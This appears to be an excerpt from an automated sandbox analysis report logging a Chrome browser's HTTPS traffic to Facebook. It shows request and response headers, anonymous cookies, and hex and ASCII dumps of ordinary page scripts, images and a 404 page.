                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC14884INData Raw: 75 6e 63 74 69 6f 6e 20 55 69 28 64 2c 65 2c 66 29 7b 66 3d 66 26 26 30 21 3d 3d 28 65 2e 73 75 62 74 72 65 65 46 6c 61 67 73 26 38 37 37 32 29 3b 66 6f 72 28 65 3d 65 2e 63 68 69 6c 64 3b 6e 75 6c 6c 21 3d 3d 65 3b 29 7b 76 61 72 20 67 3d 65 2e 61 6c 74 65 72 6e 61 74 65 2c 68 3d 64 2c 69 3d 65 2c 6a 3d 69 2e 66 6c 61 67 73 3b 73 77 69 74 63 68 28 69 2e 74 61 67 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 31 3a 63 61 73 65 20 31 35 3a 55 69 28 68 2c 69 2c 66 29 3b 66 69 28 34 2c 69 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 55 69 28 68 2c 69 2c 66 29 3b 67 3d 69 3b 68 3d 67 2e 73 74 61 74 65 4e 6f 64 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 68 2e 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 29 74 72 79 7b 68 2e
                                                                                                                                                                                                                                Data Ascii: unction Ui(d,e,f){f=f&&0!==(e.subtreeFlags&8772);for(e=e.child;null!==e;){var g=e.alternate,h=d,i=e,j=i.flags;switch(i.tag){case 0:case 11:case 15:Ui(h,i,f);fi(4,i);break;case 1:Ui(h,i,f);g=i;h=g.stateNode;if("function"===typeof h.componentDidMount)try{h.


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                89192.168.2.449843157.240.251.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC871OUTGET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=3&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923938186096600", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923938186096600"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1705INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                90192.168.2.449842157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:25 UTC611OUTGET /rsrc.php/v3/y0/r/eFZD1KABzRA.png HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: ZFLtdcU+Go6QpmTfGJWakA==
                                                                                                                                                                                                                                Expires: Thu, 18 Sep 2025 01:57:29 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: QFsisC6aBe1AVU+nloY7zuBAQ2cwXvUKttC6YDO/Nxrt0mEcx4Bwx64FR4iGKTSXGaNgCRVZ0PEbLZcwUCM8SQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:26 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 2106
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1INData Raw: 89
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC2102INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 01 59 50 4c 54 45 47 70 4c 05 65 ff 08 65 ff 07 65 ff 10 70 ff 07 65 ff 08 66 ff 08 66 ff 08 68 ff 08 66 ff 07 66 ff 00 60 ff 10 60 ff ff ff ff 08 67 ff 07 66 ff 08 66 ff 08 67 ff 08 67 ff 08 66 ff 08 66 ff 08 66 ff 08 67 ff 07 66 ff 08 68 ff 09 65 ff 08 66 ff 08 64 ff 09 67 ff 07 65 ff 07 65 ff 06 63 ff 0a 66 ff 07 66 ff 08 65 ff 07 66 ff 09 67 ff 06 67 ff 08 65 ff 08 66 ff 08 66 ff ff ff ff ff ff ff 08 69 ff 08 68 ff 07 65 ff 09 66 ff 07 66 ff ff ff ff 0b 65 ff ff ff ff ff ff ff 07 65 ff 07 67 ff 07 66 ff 07 66 ff 0a 66 ff 09 66 ff 07 66 ff 09 66 ff 07 67 ff ff ff ff ff ff ff 06 66 ff 08 65 ff 07 65 ff ff ff ff 87 b7 ff 46 8c ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                Data Ascii: PNGIHDRe5YPLTEGpLeeepeffhff``gffggfffgfhefdgeecffefggeffiheffeegffffffgfeeF
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC3INData Raw: 42 60 82
                                                                                                                                                                                                                                Data Ascii: B`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                91192.168.2.449844157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC372OUTGET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1879INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/x-icon
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: jN3KQn2um5Jec0MvhzPgWg==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 06:34:52 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: H/IsKeQVBYhqYAX/jwGQ/uZRZXOcj5X1GHJFUHRXrpnmLtePG8B4Y8RbUgwTvV2COSnR3L6cHKcT+YVudiFkVQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:26 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 4286
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1INData Raw: 00
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC4285INData Raw: 00 01 00 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 c2 1e 00 00 c2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 00 06 e2 65 04 47 e0 63 00 95 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 64 00 bf e0 63 00 95 e2 65 00 47 ff 80 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 6a 0b 18 e2 66 02 96 e1 66 01 f1 e2 66 01 ff e1 65 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                Data Ascii: ( @ eGcdceGjfffe


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                92192.168.2.449845157.240.251.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC503OUTGET /shared/user_preferences/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC310INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                X-FB-Debug: kIGair0/0fsdSwAW6pmtGn2MQtkfG6o6MmxW7aKkrjKHobkuP+x2XqeRYs/LqRytAcfHsNVIsYc5pWS8HjmcGg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:26 GMT
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC2669INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 4b 52 2d 30 47 64 68 4e 74 68 57 4c 39 7a 57 33 70 65 73 4d 4a 5f 77 69 49 54 71 59 32 4c 52 72 4c 41 77 6f 32 6f 50 74 44 69 6a 37 69 73 75 31 41 59 39 61 65 52 57 42 6d 78 6e 41 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 4a 72 43 64 63 7a 75 48 70 62 6c 37 6f 79 74 32 49 62 4c 38 6c 70 77 4b 59 73 33 6f 51 30 74 32 76 4a 6f 72 6c 6e 6a 75 33 4a 43 42 53 55 58 47 79 30 38 6f 65 67 58 63 67 79 43 6b 67 6a 6e 54 61 42 62 54 30 33 38 74 36 7a 4e 72 57 6b 48 4c 46 62 4d 46 78 43 39 50 50 6a 4b 71 64 32 61 74 70 42 77 57 68 5f 6d 71 32 73 4d 2d 79 69 22 3b 20 65 5f 66 62 5f 76 69
                                                                                                                                                                                                                                Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcKR-0GdhNthWL9zW3pesMJ_wiITqY2LRrLAwo2oPtDij7isu1AY9aeRWBmxnA"; e_clientaddr="AcJrCdczuHpbl7oyt2IbL8lpwKYs3oQ0t2vJorlnju3JCBSUXGy08oegXcgyCkgjnTaBbT038t6zNrWkHLFbMFxC9PPjKqd2atpBwWh_mq2sM-yi"; e_fb_vi
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC51INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Alt-Svc: h3=":443"; ma=86400Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1470INData Raw: 33 38 34 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 50 49 48 6a 65 59 6c 61 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                                                                                                                Data Ascii: 384d<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="PIHjeYla">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1500INData Raw: 72 63 2e 70 68 70 2f 79 62 2f 72 2f 68 4c 52 4a 31 47 47 5f 79 30 4a 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 58 2f 6c 2f 30 2c 63 72 6f 73 73 2f 63 61 63 34 39 51 74 47 32 4c 64 2e 63 73 73 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 77 58 61 56 6f 6c 67 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                                                Data Ascii: rc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css" data-bootloader-hash="wXaVolg" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https:
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1500INData Raw: 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 34 33 34 34 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 4f 72 4d 6f 62 69 6c 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 36 34 30 22 2c 5b 22 50 72 6f 6d 69 73 65 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 50 72 6f 6d 69 73 65 49 6d 70 6c 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 35 38 22 2c 5b 22 46 42 4a 53 4f 4e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 46 42 4a 53 4f 4e 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 37 38 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c
                                                                                                                                                                                                                                Data Ascii: clearTimeoutWWWOrMobile",null]},-1],["cr:4344",["setTimeoutWWWOrMobile"],{"__rc":["setTimeoutWWWOrMobile",null]},-1],["cr:6640",["PromiseImpl"],{"__rc":["PromiseImpl",null]},-1],["cr:8958",["FBJSON"],{"__rc":["FBJSON",null]},-1],["cr:1078",[],{"__rc":[nul
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1500INData Raw: 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6f 6b 69 65 50 72 69 76 61 63 79 53 61 6e 64 62 6f 78 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 69 73 5f 61 66 66 65 63 74 65 64 5f 62 79 5f 73 61 6d 65 73 69 74 65 5f 6c 61 78 22 3a 66 61 6c 73 65 7d 2c 37 37 32 33 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a
                                                                                                                                                                                                                                Data Ascii: lacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CookiePrivacySandboxConfig",[],{"is_affected_by_samesite_lax":false},7723],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"domain":
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1500INData Raw: 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 49 4e 53 54 41 47 52 41 4d 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c
